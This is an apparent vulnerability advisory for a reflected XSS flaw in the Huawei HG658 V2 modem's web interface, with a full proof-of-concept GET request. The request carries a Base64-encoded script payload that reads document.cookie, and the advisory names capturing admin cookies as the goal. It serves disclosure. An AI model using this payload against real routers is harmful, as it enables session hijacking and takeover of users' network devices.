HUAWEI HG658 V2 => Modem Web Interface Reflected XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://cyber-warrior.org
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : HUAWEI
|~Affected Version : HG658 V2
|~Official Web: http://www.huawei.com
####################INFO################################
the same network with a social engineering scenario
is on the modem manager to do the admin cookies can be captured
########################################################
----------------------------------------------------------
HTTP://192.168.1.1/html/pub/WanConnectionInfo.html?origin=[Base64 XSS Code]
Proof image: http://i.hizliresim.com/EgqAkv.png
----------------------------------------------------------
Request
----------------------------------------------------------
GET http://192.168.1.1/html/pub/WanConnectionInfo.html?origin=Ij48c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: username=admin; SessionID_R3=CaRyWGufAmjwkbRbn0HTfRFZ0GqzVM6y38r0r0NvID0BPc5prfJNScondh34nopeC0dRFiPtEx4IpngNmkZ6te9tlWDKk8Hoolzo2FjW5nu3BeUn5uAb0k1FDgQG2zH
Connection: keep-alive
Upgrade-Insecure-Requests: 1
If-None-Match: R5